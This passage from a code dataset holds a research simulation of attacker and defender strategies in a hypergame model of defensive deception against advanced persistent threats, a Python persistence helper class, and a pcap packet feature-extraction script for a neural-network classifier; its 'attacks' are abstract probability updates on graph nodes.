G_real.nodes[n][\"compromised_status\"] = True\n G_att.nodes[n][\"compromised_status\"] = True\n# G_def.nodes[n][\"compromised_status\"] = True\n attack_result[\"ids\"].append(n)\n\n return attack_result\n\n\n# In[44]:\n\n\n# AS4 – Distributed Denial-of-Service (DDoS)\n# return: attack_result[\"ids\"] is the node that Unknow Vulnerability(UV) increased\n\n\ndef attack_AS_4(G_real, G_att, G_def, attack_detect_prob, P_fake, attacker_locaton):\n\n attack_cost = 3\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n if random.random() < attack_detect_prob:\n attacker_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacker_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n \n max_APV_id = None\n max_APV = 0\n\n # perform DDoS\n for node_id in attacker_adjacent:\n if G_real.has_node(node_id):\n G_real.nodes[node_id][\"unknown vulnerability\"][0] = min(\n G_real.nodes[node_id][\"unknown vulnerability\"][0] * 1.1, 10)\n G_att.nodes[node_id][\"unknown vulnerability\"][0] = min(\n G_att.nodes[node_id][\"unknown vulnerability\"][0] * 1.1, 10)\n G_def.nodes[node_id][\"unknown vulnerability\"][0] = min(\n G_def.nodes[node_id][\"unknown vulnerability\"][0] * 1.1, 10)\n\n # update nodes attribute\n graph_function.update_vul(G_real)\n graph_function.update_vul(G_att)\n graph_function.update_vul(G_def)\n \n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n # decide which node to compromise\n for node_id in attacker_adjacent:\n if G_att.has_node(node_id):\n if calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"], attack_cost,\n attack_detect_prob) >= max_APV: # choose node with APV\n max_APV = calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"],\n attack_cost, attack_detect_prob)\n max_APV_id = G_att.nodes[node_id][\"id\"]\n\n if max_APV_id is None:\n if display:\n print(\"attacker have no legitimate adjacent node \\U0001F630\")\n return attack_result\n \n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS4: collusive attack\")\n return attack_result\n\n # compromise attempt\n if random.random() < G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n attack_result[\"ids\"].append(max_APV_id)\n # set it compromised\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n else:\n if display:\n print(\"AS4: unsuccessful on\", max_APV_id, \"with vul\",\n G_real.nodes[max_APV_id][\"normalized_vulnerability\"])\n \n return attack_result\n\n\n\n# In[45]:\n\n\n# AS5 – Zero-day attacks\ndef attack_AS_5(G_real, G_att, G_def, attacker_locaton, attack_detect_prob):\n \n attack_cost = 1\n \n if random.random() < attack_detect_prob:\n attacked_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacked_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n\n max_APV_id = None\n max_APV = 0\n # decide which node to compromise\n for n in attacked_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost, attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost, attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return 
attack_result\n \n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS5: collusive attack\")\n return attack_result\n \n # try compromising\n # if random.uniform(0, 10) <= G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n if random.uniform(0, 10) <= G_real.nodes[max_APV_id][\"unknown vulnerability\"][0]:\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n \n return attack_result\n\n\n# In[46]:\n\n\n# AS6 – Breaking encryption\n\n\ndef attack_AS_6(G_real, G_att, G_def, attacker_locaton, P_fake,\n attack_detect_prob):\n\n attack_cost = 3\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n if random.random() < attack_detect_prob:\n attacked_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacked_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n\n # decide which node to compromise\n max_APV_id = None\n max_APV = 0\n for n in attacked_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return attack_result\n\n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS6: collusive attack\")\n return attack_result\n\n # compromise attempt\n if random.random() <= sum(\n G_real.nodes[max_APV_id][\"encryption vulnerability\"]) / len(\n G_real.nodes[max_APV_id][\"encryption vulnerability\"]):\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n # G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n else:\n if display:\n print(\"AS6: unsuccessful on\", max_APV_id, \"with APV\", max_APV)\n\n return attack_result\n\n\n# In[47]:\n\n\n# AS7 – Fake identity\ndef attack_AS_7(G_real, G_att, G_def, attacker_locaton, P_fake,\n attack_detect_prob):\n\n attack_cost = 2\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n # Increase EV\n if random.random() < attack_detect_prob:\n attacker_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacker_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n\n for node_id in attacker_adjacent:\n if G_real.has_node(node_id):\n length = len(G_real.nodes[node_id][\"encryption vulnerability\"])\n for index in range(length):\n G_real.nodes[node_id][\"encryption vulnerability\"][index] = min(\n G_real.nodes[node_id][\"encryption vulnerability\"][index] *\n 1.1, 10)\n G_att.nodes[node_id][\"encryption vulnerability\"][index] = min(\n G_att.nodes[node_id][\"encryption vulnerability\"][index] *\n 1.1, 10)\n G_def.nodes[node_id][\"encryption vulnerability\"][index] = min(\n G_def.nodes[node_id][\"encryption vulnerability\"][index] *\n 1.1, 10)\n\n # update nodes attribute\n graph_function.update_vul(G_real)\n graph_function.update_vul(G_att)\n 
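# the defender's view gets the same refresh\n    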
graph_function.update_vul(G_def)\n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n # decide which node to compromise\n max_APV_id = None\n max_APV = 0\n for n in attacker_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return attack_result\n\n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS6: collusive attack\")\n return attack_result\n\n # try compromising\n for index in range(len(G_att.nodes[n][\"encryption vulnerability\"])):\n if random.uniform(\n 0, 10\n ) <= G_real.nodes[max_APV_id][\"encryption vulnerability\"][index]:\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n break\n\n return attack_result\n\n\n# In[48]:\n\n\n# AS8 – Data exfiltration\ndef attack_AS_8(G_real, G_att, G_def, compromised_nodes, attacker_locaton,\n P_fake, attack_detect_prob):\n\n if random.random() < attack_detect_prob:\n attacked_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacked_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n\n attack_cost = 3\n attack_result = {\n \"attack_cost\": attack_cost,\n \"ids\": [],\n \"data_exfiltrated\": False\n }\n\n # decide which node to compromise\n max_APV_id = None\n max_APV = 0\n for n in attacked_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return attack_result\n\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n # collusive attack\n attack_result[\"ids\"].append(max_APV_id)\n else:\n if random.random() <= G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n # compromise attempt\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n \n \n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n else:\n compromised_nodes.append(max_APV_id)\n\n # data exfiltration\n Thres_c = 30*5 #30 # pre-set value\n total_compromised_importance = 0\n for node_id in compromised_nodes:\n if G_real.has_node(node_id):\n if G_real.nodes[node_id][\"compromised_status\"]:\n total_compromised_importance += G_real.nodes[node_id][\n \"importance\"]\n\n if total_compromised_importance > Thres_c:\n if display: print(\"Data exfiltration success\")\n if display:\n print(\"total collected importance is\",\n total_compromised_importance)\n attack_result[\"data_exfiltrated\"] = True\n else:\n if display: print(\"Data exfiltration failed\")\n attack_result[\"data_exfiltrated\"] = False\n\n return attack_result\n\n\n# In[49]:\n\n\n# below is for class\n\n\n# In[50]:\n\n\ndef attacker_class_choose_strategy(self, def_strategy_number,\n defend_cost_record, 
defend_impact_record):\n\n # attacker is 100% sure of CKC subgame\n P_subgame = np.zeros(self.CKC_number + 1)\n P_subgame[self.CKC_position] = 1\n\n S_j = np.zeros(self.strategy_number)\n for j in range(self.strategy_number):\n for k in range(self.CKC_number + 1):\n S_j[j] += P_subgame[k] * self.prob_believe_opponent[k][j]\n\n if display: print(f\"S_j in att is {S_j}\")\n\n # eq. 19 (Uncertainty g)\n g = self.uncertainty\n \n # eq. 17\n utility = np.zeros((self.strategy_number, def_strategy_number))\n for i in range(self.strategy_number):\n for j in range(def_strategy_number):\n utility[i,\n j] = (self.impact_record[i] +\n defend_cost_record[j] / 3) - (\n self.strat_cost[i] / 3 + defend_impact_record[j])\n \n # normalization range\n a = 1\n b = 10\n \n # eq. 8\n EU_C = np.zeros(self.strategy_number)\n for i in range(self.strategy_number):\n for j in range(def_strategy_number):\n EU_C[i] += S_j[j] * utility[i, j]\n # Normalization\n if (max(EU_C)-min(EU_C)) != 0:\n EU_C = a + (EU_C-min(EU_C))*(b-a)/(max(EU_C)-min(EU_C))\n self.EU_C = EU_C\n\n \n # eq. 9\n EU_CMS = np.zeros(self.strategy_number)\n for i in range(self.strategy_number):\n w = np.argmin(utility[i]) # min utility index\n EU_CMS[i] = self.strategy_number * S_j[w] * utility[i][w]\n # Normalization\n if (max(EU_CMS)-min(EU_CMS)) != 0:\n EU_CMS = a + (EU_CMS- min(EU_CMS))*(b-a)/(max(EU_CMS)-min(EU_CMS))\n self.EU_CMS = EU_CMS\n \n # eq. 7\n# HEU = np.zeros(self.strategy_number)\n# for index in range(self.strategy_number):\n# HEU[index] = ((1 - g) * EU_C[index]) + (g * EU_CMS[index])\n# \n if random.random() > g:\n HEU = EU_C\n self.HEU = HEU # uncertainty case doesn't consider as real HEU\n else:\n HEU = np.ones(self.strategy_number)\n\n self.AHEU = HEU\n\n # eq. 23\n AHEU = np.zeros(self.strategy_number)\n for index in range(self.strategy_number):\n AHEU[index] = HEU[index] * self.strat_option[\n self.CKC_position, index] # for Table 4\n\n\n \n self.chosen_strategy = random.choices(range(self.strategy_number),\n weights=AHEU,\n k=1)[0]\n return self.chosen_strategy\n\n\n# In[51]:\n\n\ndef attacker_class_execute_strategy(self, G_real, G_def, P_fake,\n attack_detect_prob):\n return_value = False\n attack_result = {\"attack_cost\": 0, \"ids\": []}\n\n if self.chosen_strategy == 0:\n\n attack_result = attack_AS_1(G_real, self.network, G_def,\n self.collection_list, self.monit_time)\n return_value = True\n elif self.chosen_strategy == 1:\n attack_result = attack_AS_2(self.collection_list, G_real, self.network,\n G_def, P_fake, attack_detect_prob, self.location)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n\n # decrease collection list\n if self.location is None:\n self.collection_list.remove(attack_result[\"ids\"][0])\n\n return_value = True\n else:\n if display: print(\"attack 2 failed\")\n\n elif self.chosen_strategy == 2:\n attack_result = attack_AS_3(self.collection_list, G_real, self.network, G_def, P_fake,\n attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 3 failed\")\n\n elif self.chosen_strategy == 3:\n attack_result = attack_AS_4(G_real, self.network, G_def,\n attack_detect_prob, P_fake, self.location)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 4 failed\")\n\n elif self.chosen_strategy == 4:\n attack_result = attack_AS_5(G_real, self.network, G_def, self.location,\n 
attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 5 failed\")\n\n elif self.chosen_strategy == 5:\n attack_result = attack_AS_6(G_real, self.network, G_def, self.location,\n P_fake, attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 6 failed\")\n\n elif self.chosen_strategy == 6:\n attack_result = attack_AS_7(G_real, self.network, G_def, self.location,\n P_fake, attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 7 failed\")\n\n else:\n attack_result = attack_AS_8(G_real, self.network, G_def,\n self.compromised_nodes, self.location,\n P_fake, attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n# return_value = True\n\n if attack_result[\"data_exfiltrated\"]:\n if display: print(\"attacker exfiltrate data\")\n return_value = True\n else:\n if display: print(\"attack 8 failed\")\n\n self.impact_record[self.chosen_strategy] = attack_impact(\n G_real, attack_result[\"ids\"])\n \n if attack_result[\"ids\"]:\n self.location = random.choice(attack_result[\"ids\"])\n \n\n\n return return_value\n\n\n# In[53]:\n\n\nclass attacker_class:\n def __init__(self, game, uncertain_scheme, att_detect_UpBod):\n if display: print(\"create attacker\")\n self.network = copy.deepcopy(game.graph.network) # attacker's view\n self.strategy_number = 8\n self.collection_list = []\n self.location = None\n self.impact_record = np.ones(\n self.strategy_number\n ) # attacker believe all strategy have impact initially\n self.strat_cost = att_strategy_cost(self.strategy_number)\n self.strat_option = att_strategy_option_matrix(\n game.CKC_number, self.strategy_number) # Table 4\n self.belief_context = [1 /\n (game.CKC_number + 1)] * (game.CKC_number + 1)\n self.CKC_position = 0\n self.CKC_number = game.CKC_number\n self.prob_believe_opponent = np.zeros(\n (game.CKC_number + 1,\n 8)) # 8 is defender strategy number # c_{\\kappa}\n self.obs_oppo_strat_history = np.zeros(\n (game.CKC_number + 1, 8)) # 8 is defender strategy number\n self.in_system_time = 1\n self.monit_time = 1\n self.detect_prob = random.uniform(0, att_detect_UpBod)\n self.chosen_strategy = 0\n self.in_honeynet = False\n self.uncertain_scheme = uncertain_scheme\n if self.uncertain_scheme:\n self.uncertainty = 1 #1 # 100% uncertainty at beginning (scheme change here!)\n else:\n self.uncertainty = 0\n self.HEU = np.zeros(self.strategy_number)\n self.compromised_nodes = []\n self.EU_C = None\n self.EU_CMS = None\n self.AHEU = np.zeros(self.strategy_number)\n self.att_guess_DHEU = np.zeros(self.strategy_number)\n self.chosen_strategy_record = np.zeros(self.strategy_number)\n self.defender_observation = np.zeros(self.strategy_number)\n self.att_guess_def_impact = np.ones(self.strategy_number)\n self.observed_defen_strat = 0\n self.defender_strat_cost = def_strategy_cost(self.strategy_number)\n\n choose_strategy = attacker_class_choose_strategy\n\n execute_strategy = attacker_class_execute_strategy\n\n def reset_in_system_time(self):\n self.in_system_time = 1\n return self.in_system_time\n\n def next_stage(self):\n if self.CKC_position != 5:\n self.CKC_position += 1\n\n def reset_attribute(self):\n pass\n\n def observe_opponent(self, defend_CKC, defen_strategy):\n # Observe 
strategy\n self.obs_oppo_strat_history[defend_CKC, defen_strategy] += 1\n self.observed_defen_strat = defen_strategy\n self.prob_believe_opponent = update_strategy_probability(\n self.obs_oppo_strat_history)\n\n def update_attribute(self, dec, _lambda):\n # monitor time\n self.monit_time += 1\n \n # if in_system\n if self.CKC_position >= 2:\n self.in_system_time += 1\n\n # belief context\n self.belief_context[0] = 1 - sum(self.belief_context[1:])\n\n # in honeypot\n if self.location is not None:\n if self.network.nodes[self.location][\"type\"] == 3:\n self.in_honeynet = True\n else:\n self.in_honeynet = False\n\n # uncertainty\n self.uncertainty = attacker_uncertainty_update(self.in_system_time,\n self.detect_prob, dec,\n self.uncertain_scheme, _lambda)\n # HNE Hitting Ratio\n self.defender_observation[self.chosen_strategy] += 1\n self.att_guess_DHEU = self.att_guess_def_EU_C()\n\n def att_guess_def_EU_C(self):\n # attacker observe itself\n self.chosen_strategy_record[self.chosen_strategy] += 1\n\n if np.sum(self.defender_observation) == 0:\n strat_prob = np.zeros(self.strategy_number)\n else:\n strat_prob = self.chosen_strategy_record / np.sum(self.chosen_strategy_record)\n xi = 5\n\n self.att_guess_def_impact[self.observed_defen_strat] = 1 - self.impact_record[self.chosen_strategy]\n\n utility = np.zeros((self.strategy_number, self.strategy_number))\n for i in range(self.strategy_number):\n for j in range(self.strategy_number):\n utility[i, j] = (self.att_guess_def_impact[i] +\n self.strat_cost[j] / 3) - (self.defender_strat_cost[i] / 3 + self.impact_record[j])\n EU_C = np.zeros(self.strategy_number)\n for i in range(self.strategy_number):\n for j in range(self.strategy_number):\n EU_C[i] += strat_prob[j] * utility[i, j]\n # Normalization\n a = 1\n b = 10\n if (max(EU_C) - min(EU_C)) != 0:\n EU_C = a + (EU_C - min(EU_C)) * (b - a) / (max(EU_C) - min(EU_C))\n self.EU_C = EU_C\n return EU_C\n\n\n def random_moving(self):\n if self.location is None:\n return\n\n neighbor_list = [i for i in self.network[self.location]]\n compromised_neighbor_list = [self.location\n ] # allow attacker stands still\n for index in neighbor_list:\n if self.network.nodes[index][\"compromised_status\"]:\n compromised_neighbor_list.append(index)\n\n self.location = random.choice(compromised_neighbor_list)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Wan-ZL/ARO-Foureye","sub_path":"Foureye 1 - Defensive Deception Against Advanced Persistent Threats via Hypergame Theory/PycharmProject/attacker_function.py","file_name":"attacker_function.py","file_ext":"py","file_size_in_byte":32292,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31257462444","text":"#!/usr/bin/env python3\nimport tempfile\nimport re\n\nimport apsw as lite\nimport os as os\nimport numpy as np\nimport pandas as pd\nimport bcolz as bcz\n\n\n# Suppress the warning until the next wersion\nimport blaze as blz\n\nfrom .Config import cf\nfrom apsw import ConstraintError\n\n\nclass Freezable(object):\n\n '''\n Freezable is an abstract class. 
Things that inherit from Freezable can\n    be loaded and unloaded from the Minus80.\n\n    A freezable object is a persistent object that lives in a known directory,\n    aimed at making expensive-to-build objects and databases loadable from\n    new runtimes.\n    \n    The four main things that a Freezable object supplies are:\n    - access to a sqlite database (relational records)\n    - access to a bcolz database (columnar data)\n    - access to a key/val store\n    - access to named temp files\n\n    '''\n\n    def __init__(self, name, type=None, basedir=None):\n        # Set up our base directory\n        if basedir is None:\n            self._m80_basedir = cf.options.basedir\n        self._m80_name = name\n        if type is None:\n            # Just use the class type as the type\n            self._m80_type = re.match(\n                \"<class '(.*)'>\",\n                str(self.__class__)\n            ).groups()[0]\n        # Open (or create) the dataset's database\n        self._db = self._open_db(self._m80_name)\n\n        try:\n            cur = self._db.cursor()\n            cur.execute('''\n                CREATE TABLE IF NOT EXISTS globals (\n                    key TEXT,\n                    val TEXT,\n                    type TEXT\n                );\n                CREATE UNIQUE INDEX IF NOT EXISTS uniqkey ON globals(key)\n                ''')\n        except TypeError:\n            raise TypeError('{}.{} does not exist'.format(type, name))\n\n    def _open_db(self, dbname, type=None):\n        '''\n        This is the access point to the sqlite database\n        '''\n        # This lets us grab databases for other types\n        if type is None:\n            type = self._m80_type\n        # return a connection if exists\n        return lite.Connection(\n            os.path.expanduser(\n                os.path.join(\n                    self._m80_basedir,\n                    'databases',\n                    \"{}.{}.db\".format(type, dbname)\n                )\n            )\n        )\n\n    def _bcolz(self, tblname, dbname=None, type=None, df=None, blaze=False):\n        '''\n        This is the access point to the bcolz database\n        '''\n        if type is None:\n            type = self._m80_type\n        if dbname is None:\n            dbname = self._m80_name\n        if df is None:\n            # return the dataframe if it exists \n            try:\n                df = bcz.open(\n                    os.path.expanduser(\n                        os.path.join(\n                            cf.options.basedir,\n                            'databases',\n                            \"{}.{}.{}\".format(type, dbname, tblname)\n                        )\n                    )\n                )\n            except IOError:\n                return None\n            if len(df) == 0:\n                df = pd.DataFrame()\n                if blaze:\n                    df = blz.data(df)\n            else:\n                if blaze:\n                    df = blz.data(df)\n                else:\n                    df = df.todataframe()\n            if not blaze and 'idx' in df.columns.values:\n                df.set_index('idx', drop=True, inplace=True)\n                df.index.name = None\n            return df\n        \n        else:\n            if not(df.index.dtype_str == 'int64') and not(df.empty):\n                df = df.copy()\n                df['idx'] = df.index\n            if isinstance(df,pd.DataFrame):\n                path = os.path.expanduser(\n                    os.path.join(\n                        cf.options.basedir,\n                        'databases',\n                        \"{}.{}.{}\".format(type, dbname, tblname)\n                    )\n                )\n                if df.empty:\n                    bcz.fromiter((),dtype=np.int32,mode='w',count=0,rootdir=path)\n                else:\n                    bcz.ctable.fromdataframe(df,mode='w',rootdir=path)\n            \n            if 'idx' in df.columns.values:\n                del df['idx']\n            return\n    \n    def _tmpfile(self):\n        # returns a handle to a tmp file\n        return tempfile.NamedTemporaryFile(\n            dir=os.path.expanduser(\n                os.path.join(\n                    cf.options.basedir,\n                    \"tmp\"\n                ) \n            )\n        )\n\n    def _dict(self, key, val=None):\n        '''\n        Stores global variables for the freezable object\n        '''\n        try:\n            if val is not None:\n                val_type = type(val).__name__\n                val = str(val)\n                if val_type not in ('int','float','str'):\n                    raise TypeError(\n                        'val must be in [int,float,str], not {}'.format(val_type)\n                    )\n                self._db.cursor().execute('''\n                    INSERT OR REPLACE INTO globals\n                    (key, val, type)VALUES (?, ?, ?)''', (key, val, val_type)\n                )\n            else:\n                return self._db.cursor().execute(\n                    '''SELECT val FROM globals WHERE key = ?''', (key, )\n                ).fetchone()[0]\n        except TypeError:\n            raise ValueError('{} not in database'.format(key))
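\n\n# Usage sketch (illustrative only; 'MyStore' stands in for any Freezable subclass):\n#   store = MyStore('mydata')\n#   store._dict('version', 1)   # persist a global; values are stored as text\n#   store._dict('version')      # -> '1'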
\n","repo_name":"schae234/Minus80","sub_path":"minus80/Freezable.py","file_name":"Freezable.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8910053306","text":"# from numpy import array\n# from keras.utils import plot_model\nimport sys\nimport argparse\nimport codecs\nimport pyshark\nimport numpy as np\nimport pandas as pd\nfrom keras.models import load_model\nfrom sklearn.preprocessing import OneHotEncoder\n\nnp.seterr(divide='ignore',invalid='ignore')\n\ndef analyse_ip(packet):\n    # src_ip = str(packet.ip.src)\n    number = str(packet.number) #frame no.\n    src_ip_comm = str(packet.ip.src)\n    src_ip_comm_split = src_ip_comm.split(\".\")\n    # convert the dotted-decimal IP string into a single decimal integer\n    src_ip = str(int(src_ip_comm_split[0]) * 256 ** 3 +\n                 int(src_ip_comm_split[1]) * 256 ** 2 +\n                 int(src_ip_comm_split[2]) * 256 +\n                 int(src_ip_comm_split[3]))
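\n    # e.g. '10.0.0.1' -> 10 * 256**3 + 0 * 256**2 + 0 * 256 + 1 = 167772161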
\n    # dst_ip = str(packet.ip.dst)\n    dst_ip_comm = str(packet.ip.dst)\n    dst_ip_comm_split = dst_ip_comm.split(\".\")  # same dotted-decimal split as above\n    dst_ip = str(int(dst_ip_comm_split[0]) * 256 ** 3 +\n                 int(dst_ip_comm_split[1]) * 256 ** 2 +\n                 int(dst_ip_comm_split[2]) * 256 +\n                 int(dst_ip_comm_split[3]))\n    proto = str(packet.ip.proto)\n    ip_hdr_len = str(packet.ip.hdr_len)\n    ip_pkt_len = str(packet.ip.len)\n    ip_checksum_status = str(packet.ip.checksum_status)\n    ip_ttl = str(packet.ip.ttl)\n    ip_highest_layer = str(packet.highest_layer)\n    return [number, src_ip, dst_ip, proto, ip_pkt_len, ip_checksum_status, ip_ttl]\n\n\ndef analyse_icmp(packet):\n    '''\n    only Layer ETH + IP + ICMP\n    :param packet: packet in pcap\n    :return: list of field\n    '''\n    icmp_type_code = str(packet.icmp.type) + str(packet.icmp.code)\n    icmp_checksum_status = str(packet.icmp.checksum_status)\n    icmp_data_len = str(packet.icmp.data_len)\n    return [\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\",\n            icmp_type_code, icmp_checksum_status]\n\n\ndef analyse_arp(packet):\n    # note: this helper only extracts fields and is never called from pcap2df\n    arp_src_proto_ipv4 = str(packet.arp.src_proto_ipv4)\n    arp_dst_proto_ipv4 = str(packet.arp.dst_proto_ipv4)\n    arp_opcode = str(packet.arp.opcode)\n\n\ndef analyse_tcp(packet):\n    try:\n        stream_index = str(packet.tcp.stream)\n    except:\n        stream_index = \"\"\n    src_port = str(packet.tcp.srcport)\n    dst_port = str(packet.tcp.dstport)\n    tcp_hdr_len = str(packet.tcp.hdr_len)\n    tcp_pkt_len = str(packet.tcp.len)\n    tcp_timestamp = str(packet.tcp.time_relative)\n    tcp_time_delta = str(packet.tcp.time_delta)\n    tcp_flags = str(packet.tcp.flags)\n    tcp_flags_ack = str(packet.tcp.flags_ack)\n    tcp_flags_syn = str(packet.tcp.flags_syn)\n    tcp_flags_fin = str(packet.tcp.flags_fin)\n    tcp_flags_urg = str(packet.tcp.flags_urg)\n    tcp_ack = str(packet.tcp.ack)\n    tcp_checksum_status = str(packet.tcp.checksum_status)\n    tcp_payload = codecs.decode(packet.tcp.payload.replace(\":\", \"\"), \"hex\").decode('utf-8')  # decoded payload (currently unused)\n    return [stream_index, src_port, dst_port, tcp_timestamp, tcp_time_delta,\n            tcp_flags, tcp_flags_ack, tcp_flags_syn, tcp_flags_fin, tcp_flags_urg,\n            tcp_checksum_status, \"\", \"\"]\n\n\ndef analyse_udp(packet):\n    try:\n        stream_index = str(packet.udp.stream)\n    except:\n        stream_index = \"\"\n    src_port = str(packet.udp.srcport)\n    dst_port = str(packet.udp.dstport)\n    # udp_hdr_len = str(packet.udp.hdr_len)\n    udp_pkt_len = str(packet.udp.length)\n    udp_timestamp = str(packet.udp.time_relative)\n    udp_time_delta = str(packet.udp.time_delta)\n    udp_flags = \"\"\n    udp_checksum_status = str(packet.udp.checksum_status)\n    return [stream_index, src_port, dst_port, udp_timestamp, udp_time_delta,\n            udp_flags, \"\", \"\", \"\", \"\", udp_checksum_status, \"\", \"\"]
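\n\n\n# NOTE: pandas removed DataFrame.append in 2.0. On modern pandas an equivalent\n# pattern is to gather the rows in a list and concatenate once, e.g.:\n#   rows.append(pkt_out_df.to_frame().T)\n#   df = pd.concat(rows, ignore_index=True)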
\"proto\", \"ip_pkt_len\",\n \"ip_checksum_status\", \"ip_ttl\",\n \"stream_index\", \"src_port\", \"dst_port\", \"timestamp\",\n \"time_delta\", \"flags\", \"tcp_flags_ack\", \"tcp_flags_syn\",\n \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\",\n \"icmp_type_code\", \"icmp_checksum_status\"]\n df = df.append(pkt_out_df, ignore_index=True)\n elif \"UDP\" in pkt.transport_layer:\n pkt_out_list = [i] + analyse_ip(pkt) + analyse_udp(pkt)\n pkt_out_df = pd.Series(pkt_out_list).replace(r'', np.nan, regex=True)\n pkt_out_df.index = [\"\", \"number\", \"src_ip\", \"dst_ip\", \"proto\", \"ip_pkt_len\",\n \"ip_checksum_status\", \"ip_ttl\",\n \"stream_index\", \"src_port\", \"dst_port\", \"timestamp\",\n \"time_delta\", \"flags\", \"tcp_flags_ack\", \"tcp_flags_syn\",\n \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\",\n \"icmp_type_code\", \"icmp_checksum_status\"]\n df = df.append(pkt_out_df, ignore_index=True)\n elif \"ICMP\" in pkt.ip_highest_layer:\n pkt_out_list = [i] + analyse_ip(pkt) + analyse_icmp(pkt)\n pkt_out_df = pd.Series(pkt_out_list).replace(r'', np.nan, regex=True)\n pkt_out_df.index = [\"\", \"number\", \"src_ip\", \"dst_ip\", \"proto\", 